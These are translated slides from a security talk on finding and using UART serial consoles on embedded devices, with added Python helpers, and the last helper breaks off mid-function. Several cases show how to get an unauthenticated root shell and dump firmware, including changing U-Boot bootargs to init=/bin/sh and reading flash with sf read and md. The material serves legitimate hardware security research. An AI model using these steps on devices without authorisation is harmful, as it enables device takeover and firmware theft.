Everything about Serial Port Hacking on embedded devices! Subtitle: UART hacking. Mongii, Senior Researcher, Grayhash
Talk outline: Introduction / Serial Port (UART) basics / Serial Port (UART) hacking, case by case / Defending against Serial Port (UART) hacking
Introduction: what do you need to know before you can hack a particular device?
Introduction: What is inside it? What OS does it run (does it run an OS at all)? Which programs are running? Where should you aim for a vulnerability? At first you have no idea where to start.
The thing to try at that point: Serial Port Hacking!
Serial Port == UART. What is it? Universal Asynchronous Receiver/Transmitter. A serial communication protocol: each direction (transmit, receive) uses a single line. One of the hardware communication standards, and the protocol itself is very simple.
Debugging embedded systems: embedded development produces plenty of bugs, so developers need a way to print the device's state in real time. Output on an LED? Too little expressiveness. Output on an LCD? Complex to implement and the screen is small. Over the network? More effort than the thing being debugged. So what do developers choose? Plain UART!
UART programming examples. Two minimal transmit examples, one for an AVR (ATmega-class) MCU and one for an LPC2148 (ARM7), each sending "ABC" at 9600 bps. Extraction had interleaved the two; they are separated here, and a transmit-ready wait is added so consecutive bytes are not lost.

AVR example (assumes <avr/io.h> and a 7.3728 MHz clock, for which UBRR = 47 gives 9600 bps):

#include <avr/io.h>

int main(void)
{
    UCSR0A = 0x00;                           /* status register A: clear flags */
    UCSR0B = (1 << RXEN0) | (1 << TXEN0);    /* enable receiver and transmitter (0x18); the slide's 0x88 is RXCIE0|TXEN0 */
    UCSR0C = (1 << UCSZ01) | (1 << UCSZ00);  /* asynchronous, no parity, 1 stop bit, 8 data bits (0x06) */

    /* Important: baud rate. UBRR = F_CPU / (16 * baud) - 1 = 47 for 9600 bps at 7.3728 MHz */
    UBRR0H = 0;
    UBRR0L = 47;

    const char *msg = "ABC";
    for (const char *p = msg; *p; p++) {
        while (!(UCSR0A & (1 << UDRE0)))     /* wait until the transmit data register is empty */
            ;
        UDR0 = *p;
    }
    return 0;
}

LPC2148 (ARM-based) example (assumes the register names from <lpc214x.h> and PCLK of about 15 MHz, for which DLL = 0x62 gives 9600 bps):

#include <lpc214x.h>

int main(void)
{
    PINSEL0 = 0x00000005;   /* P0.0 as TXD0, P0.1 as RXD0 */
    U0LCR   = 0x83;         /* 8 data bits, no parity, 1 stop bit, DLAB = 1: enable access to the divisor latches */
    U0DLM   = 0x00;
    U0DLL   = 0x62;         /* baud = PCLK / (16 * 0x62) = 9600 bps */
    U0LCR   = 0x03;         /* DLAB = 0: disable access to the divisor latches */

    const char *msg = "ABC";
    for (const char *p = msg; *p; p++) {
        while (!(U0LSR & (1 << 5)))   /* wait for THRE: transmit holding register empty */
            ;
        U0THR = *p;
    }
    return 0;
}
What an attacker gets from the UART: kernel and OS messages, which supply the information needed to attack a vulnerability; debug messages, e.g. printf("initializing network adaptor ok\n"); error messages, e.g. "Segmentation fault", "command not found".
What an attacker gets from the UART: hidden or settings menus; the bootloader (read out the firmware, write new firmware); a command shell (obtain the firmware and binaries, perform dynamic analysis).
Equipment needed for UART hacking: a USB-to-TTL adapter (Rabbit UART, http://bit.ly/29wtgof); jumper wires (http://bit.ly/29exctc).
Equipment needed for UART hacking: a multimeter (DM-300A, http://bit.ly/29vyfxz); a logic analyzer (https://www.saleae.com/, http://bit.ly/29ywzzw).
Settings for a UART connection: COM port number, baud rate, data bits, stop bits, parity bit.
UART pin layout: four pins are used. TX: data transmit pin. RX: data receive pin. GND: ground. VCC: supply voltage. TX and RX are named from each device's own point of view: the PC's TX is where the PC transmits, the router's TX is where the router transmits. So PC TX goes to the device's RX, PC RX to the device's TX, and GND is always shared.
UART connection procedure summary: install the USB driver for the adapter chip (CP2102, PL2303, FTDI, etc.); connect the jumper wires; install a terminal program (PuTTY, Xshell, screen); set the connection parameters and connect.
UART connection complete.
UART Failure CASE by CASE
UART Failure CASE by CASE
1. I can't find the UART pins
2. I can't find the UART pins: audio jack
3. I can't find the UART pins: USB connector
4. The UART connector is too small
5. I can't tell RX/TX/GND/VCC apart
6. Tapping the CPU pins directly
7. Tapping the CPU pins directly: BGA package
8. The characters are garbled: baud rate
9. The characters are garbled: GND
10. The characters are garbled: voltage level
11. The characters are garbled: signal inversion
12. UART is turned off: debugging enable
13. UART is turned off: jumper enable
14. No shell appears: Ctrl+C
15. No shell appears, but the bootloader does: bootargs
16. No shell appears, but the bootloader does: firmware dump
17. Neither shell nor bootloader appears: magic key
18. I want to see the UART messages in a PTS: dup2()
19. The device reboots whenever I use gdb: watchdog
20. I can't get the binary files off the device
1. I can't find the UART pins
Identify them by the PCB silkscreen labels (TX/RX/GND/VCC printed next to the pads).
Identify them by a row of four pins.
A four-pin row may also be just pads or test points (PAD, TP) with no header soldered.
The UART pins may be mixed in among a larger group of pins.
2. I can't find the UART pins: audio jack
UART on an audio jack: on some devices the UART port is brought out as an audio jack.
Audio jack UART example
시연영상 https://www.youtube.com/watch?v=nhawn8xvvqe
Nexus UART on the audio jack (Nexus 4, "mako"): the bootloader and kernel log captured through the jack

welcome to mako bootloader
[90] cable type from shared memory: 8
[130] reboot_mode restart reason = reboot
[320] kernel @ 80208000 (5677280 bytes)
[330] ramdisk @ 81800000 (357803 bytes)
[330] get_display_kcal = 0, 0, 0, x
[330] Booting Linux
[340] Power on reason 65281
[340] Power on reason 65281
[340] booting linux @ 0x80208000, ramdisk @ 0x81800000 (357803)
[350] cmdline: console=ttyHSL0,115200,n8 androidboot.hardware=mako lpj=67677 uart_console=enable lcd_maker_id=primary lge.hreset=off lge.reset=mode_reset gpt=enable lge.kcal=0 0 0 x lge.rev=rev_11 mdm_force_dump_enabled androidboot.emmc=true androidboot.serialn
[    0.000000] Booting Linux on physical CPU 0
[    0.000000] Initializing cgroup subsys cpu
[    0.000000] Linux version 3.4.0-perf-g7ce11cd (android-build@vpbs1.mtv.corp.google.com) (gcc version 4.6.x-google 20120106 (prerelease) (GCC) ) #1 SMP PREEMPT Tue Jan 29 11:41:33 PST 2013
[    0.000000] CPU: ARMv7 Processor [510f06f2] revision 2 (ARMv7), cr=10c5387d
[    0.000000] CPU: PIPT / VIPT nonaliasing data cache, PIPT instruction cache
[    0.000000] Machine: QCT APQ8064 MAKO
[    0.000000] Truncating memory at 0xc0000000 to fit in 32-bit physical address space
[    0.000000] memory pool 3 (start fe9ff000 size 1600000) initialized
[    0.000000] Initialized persistent memory from 88700000-887fffff
[    0.000000] Memory policy: ECC disabled, Data cache writealloc
[    0.000000] socinfo_init: v6, id=109, ver=1.1, raw_id=1817, raw_ver=1817, hw_plat=8, hw_plat_ver=65536
[    0.000000] accessory_chip=0 hw_plat_subtype=1
3. I can't find the UART pins: USB connector
Galaxy USB connector: on some devices the UART is reachable through the USB port.
USB accessory detection: the phone measures the resistance on the connector's ID pin to tell the different accessory functions apart.
Galaxy S USB functions: changing the resistance on the micro-USB port unlocks hidden functions. http://forum.xda-developers.com/showthread.php?t=820275
Buying a USB connector: http://devicemart.co.kr/goods/view.php?seq=29454
How to wire the micro-USB pins
Making the 619 kΩ resistance
Wiring the USB circuit
시연영상 https://www.youtube.com/watch?v=_xyht7pmx8q
FSA9480 USB switch chip
FSA9480 USB switch chip: the UART description in its datasheet
4. The UART connector is too small
When the connector is too small: a UART connector the size of a fingernail..
When the connector is too small: it is hard to buy a matching connector online.
When the connector is too small: off to the Guro electronics market..
Found a matching connector..
시연영상 https://www.youtube.com/watch?v=usyakfpspks
5. I can't tell RX/TX/GND/VCC apart.
Finding them with a multimeter. GND: the (-) probe position at which you read 5 V (or 3.3 V). VCC: a steady 5 V (or 3.3 V). TX: also reads the high level, because the line idles HIGH, and dips while the device prints. RX: either the high level (pulled up) or 0 V.
UART protocol: start bit + data bits + stop bit. The line stays HIGH when idle. This is a property of TTL (transistor-transistor logic) signalling.
The LED method. When the LED lights, the pin on its (-) side is GND. The pin that keeps the LED lit continuously is VCC. The pin that flickers at power-on is TX. The remaining one is RX. Always use a series resistor! Otherwise you can damage the device.
Demo video, the flickering TX pin: https://www.youtube.com/watch?v=d91wlue_rwe
Using the PCB's own characteristics. The board's background (usually green) areas: the top or bottom copper layer is generally all GND, to make the frequently used (-) easy to reach and to reduce circuit noise. So a pin connected to the top or bottom plane is GND. RX and TX run as traces to the MCU. VCC is usually routed on another layer of the PCB.
Finding them with a multimeter continuity test. Set the multimeter to continuity mode. Touch one probe to a known (+) or (-) point on the PCB and check whether it beeps. Or touch the (+) or (-) pin of an IC whose datasheet you have and check whether it beeps.
시연영상 https://www.youtube.com/watch?v=xsmw2dib46u
Telling RX from TX by current: the TX pin sources 30~50 mA when measured to GND (an output driver). Note that measuring this way shorts the pin through the meter; keep it brief.
Telling RX from TX by current: the RX pin draws almost nothing (it is an input).
Finding VCC by trace width: the VCC trace is thicker than the others, to carry enough supply current.
Finding them with an oscilloscope or logic analyzer: you can watch the HIGH/LOW transitions directly.
6. Tapping the CPU pins directly
Tapping the CPU directly: if the CPU's pins are exposed there is no need to hunt for the UART on the PCB at all.
Tapping the CPU directly: check the datasheet for the CPU's UART pins.
Demo video, tapping the CPU directly on an IPTIME router: https://www.youtube.com/watch?v=obdgjryem04
7. Tapping the CPU pins directly: BGA package
A BGA-packaged CPU (!)
Strategy, step 1: desolder the BGA chip
Strategy, step 2: bring the TX and RX balls out on wires
Strategy, step 3: re-solder the chip
BGA desoldering, first attempt: https://www.youtube.com/watch?v=9hvukxkd038
Result of the first attempt
BGA desoldering, second attempt: https://www.youtube.com/watch?v=likeqongmd8
Result of the second attempt
BGA reballing: https://www.youtube.com/watch?v=elog3am6la8
Strategy, rethought: what if we just solder wires onto the traces..?
시연영상 https://www.youtube.com/watch?v=-2sclf8ktay
Check the PCB trace pattern
Check the PCB trace pattern: if the trace continues on another layer you would need an X-ray.
8. The characters are garbled (1): baud rate
Example of garbled output: https://www.youtube.com/watch?v=zczgzbi_lry
Baud rate. Because there is no clock line, the receiver needs a reference for when to sample HIGH/LOW. The baud rate defines how many HIGH/LOW symbols are sent per second; the higher it is, the faster the data transfer.
Finding the baud rate. Brute force the commonly used values: 115200 (most common), 57600, 38400, 19200, 9600 (common). Or calculate it from the signal timing.
Calculating it from the signal timing (the width of one bit): 9600: 104 µs; 14400: 69 µs; 38400: 26 µs; 57600: 17 µs; 115200: 8.7 µs.
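The two ways of finding the baud rate described above, as an added example that is not part of the original talk: baud_from_bit_time() snaps a pulse width measured on a logic analyzer to the nearest standard baud, and pick_baud() scores captures from a brute-force run by how much of each looks like console text. The captures in the demo are constructed; brute_force_baud() needs pyserial and a real port, so it is only defined here, not run.

```python
# Added example: picking the baud rate from a measured bit time, or by brute force.
# Not the speaker's code; the captured data below is constructed.
from typing import Dict, Iterable, Tuple

STANDARD_BAUDS = (1200, 2400, 4800, 9600, 14400, 19200, 38400, 57600,
                  115200, 230400, 460800, 921600)


def bit_time_us(baud: int) -> float:
    """One bit period in microseconds: 115200 bps -> 8.68 us, 9600 bps -> 104.17 us."""
    return 1_000_000 / baud


def baud_from_bit_time(shortest_pulse_us: float) -> int:
    """Nearest standard baud for the shortest HIGH or LOW pulse seen on the TX line.

    The shortest pulse is a single bit period (a lone 0 or 1 between opposite bits),
    so 1 / width is the symbol rate; it is snapped to the closest standard value
    because cursor measurements are a few percent off.
    """
    measured = 1_000_000 / shortest_pulse_us
    return min(STANDARD_BAUDS, key=lambda b: abs(b - measured))


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that look like console text (printable ASCII plus tab, CR, LF).

    At the wrong baud the bytes are mis-framed and come out mostly as high-bit
    garbage, so the correct baud is the one whose capture scores highest.
    """
    if not data:
        return 0.0
    good = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return good / len(data)


def pick_baud(captures: Dict[int, bytes]) -> int:
    """Given {baud: bytes received at that baud}, return the most text-like one."""
    return max(captures, key=lambda b: printable_ratio(captures[b]))


def brute_force_baud(port: str, candidates: Iterable[int] = STANDARD_BAUDS,
                     timeout: float = 2.0) -> Tuple[int, Dict[int, bytes]]:
    """Try each candidate on a real port with pyserial (pip install pyserial).

    Reboot the target while this runs so the boot messages are what gets scored.
    """
    import serial  # pyserial; imported here so the rest of the file works without it
    captures: Dict[int, bytes] = {}
    for baud in candidates:
        with serial.Serial(port, baud, timeout=timeout) as ser:
            captures[baud] = ser.read(256)
    return pick_baud(captures), captures


if __name__ == "__main__":
    print(baud_from_bit_time(8.6))   # 115200
    # constructed captures: mis-framed garbage at 9600, a real boot line at 115200
    fake = {9600: bytes([0xFE, 0x80, 0xE6, 0xF8, 0x00, 0xFC]),
            115200: b"Booting Linux on physical CPU 0\r\n"}
    print(pick_baud(fake))           # 115200
```

Measure the narrowest pulse you can find rather than an arbitrary one: a run of identical bits is several bit periods wide and would be read as a lower baud.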
9. The characters are garbled (2): GND
Example of a missing GND: https://www.youtube.com/watch?v=8f7izhwu8do
This is what happens when GND is not connected. Always connect the GND pin when hooking up a UART: the two sides need a common reference, otherwise the voltage (potential difference) cannot be judged correctly. Any GND point on the PCB will do.
10. The characters are garbled (3): voltage level
Voltage level: the operating voltage differs from device to device: 5 V, 3.3 V, 1.8 V.
Threshold voltage: the minimum voltage that is read as 1 (HIGH), and the maximum voltage that is read as 0 (LOW).
Threshold voltage: a signal that sits between the two thresholds is read unpredictably.
When the voltage levels do not match, UART input/output does not work properly: garbled characters are printed; output works but input does not; and driving a higher voltage into the device can damage it.
Using the USB-to-TTL adapter's feature: some UART adapters can switch their level between 5 V and 3.3 V.
Level converter (shifter): http://www.devicemart.co.kr/1062638
How to use a level converter (shifter): the signal is translated between the VL (low-voltage) and VH (high-voltage) sides.
11. The characters are garbled (4): signal inversion
When the UART signal is inverted: every bit comes out flipped (0 -> 1, 1 -> 0), so the terminal cannot interpret it and prints garbage.
UART in the past: on old desktop PCs, the RS-232 interface, operating at +12 V ~ -12 V.
Typical RS-232 UART devices: serial modems, serial mice.
RS-232 and MAX232. RS-232 != UART. RS-232 is a specification for carrying UART over longer distances: which voltages to use, how the cable is wired. It uses about +-12 V and reaches roughly 15 m at its rated speed. It is one of several RSxxx standards, e.g. RS-485, RS-422.
RS-232 and MAX232. The MAX232 is a level-shifter chip that matches the voltages between devices: it converts 3.3 V / 5 V logic levels to the +-12 V RS-232 levels. Ordinary embedded devices run at 3.3 V or 5 V, while a PC serial port runs at +-12 V.
TTL vs RS-232. TTL levels: 5 V is 1, 0 V is 0. RS-232 levels: +12 V is 0, -12 V is 1 (newer hardware often uses +5 V / -5 V instead of +-12 V). So the signal gets inverted when TTL is converted to RS-232 levels.
Fixes for signal inversion: use a Bus Pirate, which has a receive-polarity (inversion) option; use a logic analyzer, whose UART decoder has an inverted-signal option and can save the decoded data to CSV; or tap the pin before it enters the driver IC, where the signal is still plain TTL.
USB-to-serial (RS-232) vs USB-to-TTL: use the adapter that matches the levels you are probing. An RS-232 adapter on a TTL header gives inverted levels and drives far too high a voltage into the device.
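The framing described in case 5 (start bit, data bits, stop bit, idle HIGH) and the inversion problem of case 11, as an added example that is not part of the original talk: encode_8n1() produces the bit stream a TTL UART puts on the line, decode_8n1() plays the receiver, and invert() models the line as seen through an RS-232 driver. The demo shows that an inverted line decodes to wrong characters plus a framing error, and that inverting it back restores the data. The sample bytes are constructed.

```python
# Added example: UART 8N1 framing and why an inverted line produces garbage.
# Pure Python, no hardware; not the speaker's code.
from typing import List, Tuple

IDLE = 1  # a TTL UART line rests HIGH when nothing is being sent


def encode_8n1(data: bytes, trailing_idle: int = 2) -> List[int]:
    """Line-level samples (one per bit period) for data framed as 8N1.

    Each byte becomes: start bit (0), eight data bits LSB first, stop bit (1).
    A few idle bits are appended, as the line sits HIGH after the last frame.
    """
    bits: List[int] = []
    for byte in data:
        bits.append(0)                                   # start bit
        bits.extend((byte >> i) & 1 for i in range(8))   # LSB first
        bits.append(1)                                   # stop bit
    bits.extend([IDLE] * trailing_idle)
    return bits


def decode_8n1(bits: List[int]) -> Tuple[bytes, int]:
    """Recover bytes from a bit stream, as a receiver with the correct baud would.

    Idle bits are skipped; the first 0 is taken as a start bit, eight data bits
    follow, then the stop bit is checked. A stop bit that is not 1 is a framing
    error; the byte is still delivered, just as a real UART does, which is how
    garbage characters end up on the terminal. Returns (bytes, framing_errors).
    """
    out = bytearray()
    errors = 0
    i = 0
    while i < len(bits):
        if bits[i] == IDLE:          # idle line (or a stop bit already consumed)
            i += 1
            continue
        if i + 9 >= len(bits):       # not enough bits left for a whole frame
            break
        value = 0
        for k in range(8):
            value |= bits[i + 1 + k] << k
        if bits[i + 9] != 1:
            errors += 1
        out.append(value)
        i += 10
    return bytes(out), errors


def invert(bits: List[int]) -> List[int]:
    """Model an inverted line: TTL seen through an RS-232 driver, or the reverse."""
    return [b ^ 1 for b in bits]


if __name__ == "__main__":
    wire = encode_8n1(b"ok")
    print(decode_8n1(wire))                   # (b'ok', 0): correct polarity
    print(decode_8n1(invert(wire)))           # (b'HJ', 1): inverted line gives garbage and a framing error
    print(decode_8n1(invert(invert(wire))))   # (b'ok', 0): inverting again restores the data
```

The inverted stream decodes to something rather than nothing because the receiver happily treats an inverted stop bit as a start bit; this is why an inverted or wrong-level line shows as a stream of odd characters rather than silence.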
12. UART is turned off: debugging enable
UART enable: turn the UART on from an administrator menu or similar setting.
시연영상 https://www.youtube.com/watch?v=auni71nl0z8
13. UART is turned off: jumper enable
Jumper enable: RX is only enabled when a particular jumper on the PCB is bridged.
Jumper enable: the UART pins (RX, TX, GND) connected.
Jumper enable: the shell is running, but typing into it does nothing!
Jumper enable: some suspicious jumpers.
Jumper enable: bridge one of them and..!
Jumper enable: now RX input works!
시연영상 https://www.youtube.com/watch?v=tdfa20u_kes
14. No shell appears: Ctrl+C
Getting a shell with Ctrl+C: https://www.youtube.com/watch?v=kz7aspvduae
Analyzing the target's boot sequence: Linux kernel loads -> /init -> /linuxrc -> /etc/init.d/rc.sysinit -> /etc/init.d/rc.mtd -> /etc/init.d/start -> /etc/bootsh -> /mnt/mtd/run (enters an infinite loop) -> /bin/sh. Because /mnt/mtd/run never returns, the shell at the end is never reached. Ctrl+C on the console sends SIGINT to that foreground process; once it dies, the init sequence continues and the shell appears.
Analyzing the target's boot sequence: the inittab shows that a shell is spawned on the serial console

/ # cat /etc/inittab
# system initialisation
::sysinit:/bin/mount -n -o remount,rw /
::sysinit:/etc/init.d/rc.sysinit
::sysinit:/etc/init.d/start
# run gettys on the serial ports
::respawn:/bin/sh < /dev/ttyS0 2>&1 > /dev/ttyS0
# stuff to do before rebooting
::ctrlaltdel:/etc/init.d/reboot
::shutdown:/bin/umount -a -r
::shutdown:/sbin/swapoff -a
/ #
15. No shell appears, but the bootloader does: bootargs
Entering the bootloader over the UART
Checking bootargs

hisilicon # printenv
bootcmd=nand read.i 0x82000000 0x00600000 0x01400000;nand read.i 0x81000000 0x00100000 0x00400000;bootm 0x81000000
bootdelay=1
baudrate=115200
ipaddr=192.168.37.175
serverip=192.168.37.77
gatewayip=192.168.37.1
netmask=255.255.255.0
modeltype=6411
modelname=snh-e6411bn
ethaddr=bc:66:41:12:12:75
bootargs=console=ttyAMA0,115200 root=/dev/ram0 rw mem=128m vram=4m initrd=0x82000000,40m init=/sbin/init ramdisk_size=40960 model=snh-e6411bn eth=00:09:18:ff:ff:ff mtdparts=hinand:512k(boot),512k(uboot-env),4M(kernel),1M(dummp2),20M(ramdisk),40M(work),4M(setting),4M(log),48M(upgrade),5M(free) ethaddr=bc:66:41:12:12:75 sn=kj2z69mg40101xw
stdin=serial
stdout=serial
stderr=serial
verify=n
ver=stw 1.06_20140414_09:45,U-Boot 2010.06-svn31999 (Jul 08 2014-14:30:11)

Environment size: 781/262140 bytes
hisilicon #
Changing bootargs: the same command line with init=/sbin/init replaced by init=/bin/sh, so the kernel drops straight into a root shell (U-Boot's syntax is setenv NAME VALUE; the value is quoted because it contains spaces)

hisilicon # setenv bootargs 'console=ttyAMA0,115200 root=/dev/ram0 rw mem=128m vram=4m initrd=0x82000000,40m init=/bin/sh ramdisk_size=40960 model=snh-e6411bn eth=00:09:18:ff:ff:ff mtdparts=hinand:512k(boot),512k(uboot-env),4M(kernel),1M(dummp2),20M(ramdisk),40M(work),4M(setting),4M(log),48M(upgrade),5M(free) ethaddr=bc:66:41:12:12:75 sn=kj2z69mg40101xw'
hisilicon # saveenv
Saving Environment to NAND
Erasing Nand
Erasing at 0xa000 100% complete.
Writing to Nand done
hisilicon #

This only works when the bootloader actually passes its arguments to the kernel. If the kernel command line is fixed in the bootloader code or compiled into the kernel itself (for example CONFIG_CMDLINE_FORCE), changing the environment has no effect; you then have to patch the string in memory (U-Boot's mw/nm commands) before booting.
Confirming that the shell runs
16. No shell appears, but the bootloader does: firmware dump
Reading the firmware from the bootloader: interrupt autoboot to get a U-Boot prompt

*********************************************
Please input Space to run Linux
Please input ESC to run UBOOT
Please input . to run burn-in
Otherwise, system will run Linux after 1 sec
*********************************************
Load image from SPI-NOR offset 0xb0000 to sdram 0x4000000
Jump 0x4000000

U-Boot 2008.10 (Aug 9 2012-13:27:23)

I2C:   ready
DRAM:  128 MB
Manufacturer ID : 0018
Device ID : 009F
Device Code 2 : 0018
Flash:  0 kb
#SF: Got idcode ef 40 18
##crc data not match, calc = b694bf29, env field = 8d9f7217
In:    serial
Out:   serial
Err:   serial
Net:   FTMAC110#0
Hit any key to stop autoboot:  0
=> Unknown command '' - try 'help'
=>
Reading the firmware from the bootloader: the available commands

=> help
?       - alias for 'help'
autoscr - run script from memory
base    - print or set address offset
bdinfo  - print Board Info structure
boot    - boot default, i.e., run 'bootcmd'
bootd   - boot default, i.e., run 'bootcmd'
bootm   - boot application image from memory
bootp   - boot image via network using BOOTP/TFTP protocol
md      - memory display
mm      - memory modify (auto-incrementing)
mtest   - simple RAM test
mw      - memory write (fill)
nfs     - boot image via network using NFS protocol
nm      - memory modify (constant address)
printenv- print environment variables
protect - enable or disable FLASH write protection
rarpboot- boot image via network using RARP/TFTP protocol
reset   - Perform RESET of the CPU
run     - run commands in an environment variable
saveenv - save environment variables to persistent storage
setenv  - set environment variables
sf      - SPI flash sub-system
sleep   - delay execution for some time
sspi    - SPI utility commands
tftpboot- boot image via network using TFTP protocol
version - print monitor version
=>
Device boot sequence: power is applied; the CPU starts reading flash from offset 0; the partition information is parsed. The first flash page, read into RAM and displayed:

=> sf read 0x0 0x0 0x1000
=> md 0
00000000: 31384d47 00003632 00010000 00010000    GM8126..........
00000010: 000b0000 000d0000 00000000 00000000    ................
00000020: 00000000 00000000 00000000 00000000    ................
00000030: 00000000 00000008 0000000c 00000018    ................
00000040: 00000000 00000000 00000000 00000000    ................
00000050: 00000000 00000000 00000000 00000000    ................
00000060: 00000000 00000000 00000000 00000000    ................
00000070: 00000000 00000000 00000000 00000000    ................
00000080: 00000000 00000000 00000000 00000000    ................
00000090: 00000000 00000000 00000000 00000000    ................
000000a0: 00000000 00000000 00000000 00000000    ................
000000b0: 00000000 00000000 00000000 00000000    ................
000000c0: 00000000 00000000 00000000 00000000    ................
000000d0: 00000000 00000000 00000000 00000000    ................
000000e0: 00000000 00000000 00000000 00000000    ................
000000f0: 00000000 00000000 00000000 aa550000    ..............U.
=>
Partition information

* From the UART messages (kernel log):
Creating 6 MTD partitions on "wb_spi_flash":
0x000d0000-0x005ff000 : "Linux Section"     // Linux kernel
0x00600000-0x01000000 : "User Section"      // root file system
0x00001000-0x00010000 : "Loader Section"    // first-stage loader
0x00010000-0x000b0000 : "BurnIn Section"    // firmware update program
0x000b0000-0x000ce000 : "UBoot Section"     // U-Boot bootloader
0x000ce000-0x000d0000 : "CFG Section"       // configuration data

* From a shell: cat /proc/mtd
dev:    size   erasesize  name
mtd0: 0052f000 00001000 "Linux Section"
mtd1: 00a00000 00001000 "User Section"
mtd2: 0000f000 00001000 "Loader Section"
mtd3: 000a0000 00001000 "BurnIn Section"
mtd4: 0001e000 00001000 "UBoot Section"
mtd5: 00002000 00001000 "CFG Section"
Flash reading: select the chip, copy the partition into RAM, then dump the RAM. The third argument of sf read is a length, not an end address, so the User Section (0x600000..0x1000000) is read with length 0xa00000, the size shown in /proc/mtd.

=> sf probe 0:0                              // select flash chip 0 on SPI bus 0
#SF: Got idcode ef 40 18
16384 KiB W25Q128BV at 0:0 is now current device
=> sf read 0x4000000 0x00600000 0x00a00000   // User Section: offset 0x600000, length 0xa00000
################################################################
################################################################
=> md 0x4000000                              // dump the copy; log the terminal output to a file
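Turning the partition information from cases 15 and 16 into exact bootloader read commands, as an added example that is not part of the original talk: parse_mtdparts() handles the mtdparts= string seen in bootargs, parse_mtd_log() the kernel's "Creating N MTD partitions" lines, and uboot_read_cmds() emits nand read / sf read commands with the right offset and length so nothing is read short or past the end of the chip. The sample strings are copied from the slides; the load addresses are the ones the device's own bootcmd uses.

```python
# Added example: mtdparts / MTD log -> U-Boot read commands. Not the speaker's code.
import re
from typing import List, Optional, Tuple

Partition = Tuple[str, int, Optional[int]]  # (name, offset, size); size None = rest of device

_UNITS = {"": 1, "k": 1024, "m": 1024 ** 2, "g": 1024 ** 3}


def _parse_size(tok: str) -> int:
    """'512k', '4M', '0x100000' -> bytes."""
    m = re.fullmatch(r"(0x[0-9a-fA-F]+|\d+)([kKmMgG]?)", tok)
    if not m:
        raise ValueError(f"bad size {tok!r}")
    return int(m.group(1), 0) * _UNITS[m.group(2).lower()]


def parse_mtdparts(mtdparts: str) -> Tuple[str, List[Partition]]:
    """Parse 'hinand:512k(boot),512k(uboot-env),4M(kernel),...' into (device, partitions).

    Offsets accumulate in order unless a part carries an explicit '@offset'.
    Whitespace after commas is tolerated here (the kernel itself would reject it).
    """
    spec = mtdparts.split("=", 1)[1] if mtdparts.startswith("mtdparts=") else mtdparts
    device, _, parts = spec.replace(" ", "").partition(":")
    result: List[Partition] = []
    offset = 0
    for part in filter(None, parts.split(",")):
        m = re.fullmatch(r"(-|[^@(]+)(?:@(0x[0-9a-fA-F]+|\d+[kKmMgG]?))?\(([^)]+)\)(ro)?", part)
        if not m:
            raise ValueError(f"bad partition {part!r}")
        if m.group(2):
            offset = _parse_size(m.group(2))
        size = None if m.group(1) == "-" else _parse_size(m.group(1))
        result.append((m.group(3), offset, size))
        if size is None:          # '-' takes the rest of the device; nothing can follow
            break
        offset += size
    return device, result


def parse_mtd_log(log: str) -> List[Partition]:
    """Parse kernel log lines like '0x000d0000-0x005ff000 : "Linux Section"'.

    A missing closing quote (as in the slide's capture) is tolerated.
    """
    pat = re.compile(r'0x([0-9a-fA-F]+)-0x([0-9a-fA-F]+)\s*:\s*"?([^"\n]+?)"?\s*$')
    found: List[Partition] = []
    for line in log.splitlines():
        m = pat.search(line.strip())
        if m:
            start, end = int(m.group(1), 16), int(m.group(2), 16)
            found.append((m.group(3).strip(), start, end - start))
    return found


def uboot_read_cmds(parts: List[Partition], load_addr: int = 0x82000000,
                    flash: str = "nand") -> List[str]:
    """One U-Boot command per partition: '<nand|sf> read LOADADDR OFFSET LENGTH  # name'.

    Partitions of unknown size ('-') are skipped; read those with the chip size
    reported by 'sf probe' or 'nand info'.
    """
    cmds = []
    for name, off, size in parts:
        if size is None:
            continue
        cmds.append(f"{flash} read {load_addr:#x} {off:#x} {size:#x}   # {name}")
    return cmds


if __name__ == "__main__":
    # the mtdparts string from the camera's bootargs (slide 15)
    dev, parts = parse_mtdparts("mtdparts=hinand:512k(boot),512k(uboot-env),4M(kernel),"
                                "1M(dummp2),20M(ramdisk),40M(work),4M(setting),4M(log),"
                                "48M(upgrade),5M(free)")
    for c in uboot_read_cmds(parts):
        print(c)
```

The kernel and ramdisk commands this produces (nand read 0x82000000 0x100000 0x400000 and 0x600000 0x1400000) match the offsets and lengths in the device's own bootcmd, which is a good sanity check before trusting the generated commands for the other partitions.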
UART with Python: automate the serial session with pyserial, https://github.com/pyserial/pyserial
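One way to script the dump above with pyserial, as an added example that is not the speaker's code: parse_md_dump() turns U-Boot md output back into the bytes that were in memory, and dump_flash_via_uboot() drives the prompt (sf probe, sf read, md.l in chunks) and writes the reassembled image to a file. The parser is exercised on the md listing from case 16; the dumping function needs pyserial and a board sitting at the U-Boot prompt, so it is defined but not run here. The prompt string "=> ", the load address and the chunk size are assumptions taken from that device.

```python
# Added example: rebuild a binary from U-Boot 'md' output and drive the dump over pyserial.
# Not the speaker's code.
import re
from typing import Optional

# "00000000: 31384d47 00003632 00010000 00010000    GM8126.........."
_MD_LINE = re.compile(r"^([0-9a-fA-F]{8}):((?:\s+[0-9a-fA-F]{8}){1,4})")


def parse_md_dump(text: str, byteorder: str = "little") -> bytes:
    """Convert U-Boot 'md' / 'md.l' output back into the bytes that were in memory.

    Each word is printed as a 32-bit value in CPU byte order, so on a little-endian
    ARM the word 0x31384d47 stands for the bytes 47 4d 38 31 ('GM81'); the ASCII
    column on the right is only a rendering and is ignored. Addresses must be
    contiguous: a gap means the terminal dropped a line and the dump is unusable.
    """
    out = bytearray()
    expected: Optional[int] = None
    for raw in text.splitlines():
        m = _MD_LINE.match(raw.strip())
        if not m:
            continue                    # command echo, prompt, noise
        addr = int(m.group(1), 16)
        if expected is not None and addr != expected:
            raise ValueError(f"dump not contiguous at {addr:#x}, expected {expected:#x}")
        words = m.group(2).split()
        for w in words:
            out += int(w, 16).to_bytes(4, byteorder)
        expected = addr + 4 * len(words)
    return bytes(out)


def dump_flash_via_uboot(port: str, offset: int, length: int, out_path: str,
                         baud: int = 115200, load_addr: int = 0x4000000,
                         chunk: int = 0x1000, prompt: bytes = b"=> ") -> int:
    """sf probe, sf read the region into RAM, then md.l the RAM in chunks and reassemble.

    Returns the number of bytes written. 'prompt' must match the board's U-Boot prompt
    exactly; md.l takes a word count, hence chunk // 4. Requires pyserial.
    """
    if length % 4 or chunk % 4:
        raise ValueError("length and chunk must be multiples of 4 bytes")
    import serial  # pyserial

    def cmd(ser, line: bytes) -> str:
        ser.write(line + b"\n")
        return ser.read_until(prompt).decode("ascii", "replace")

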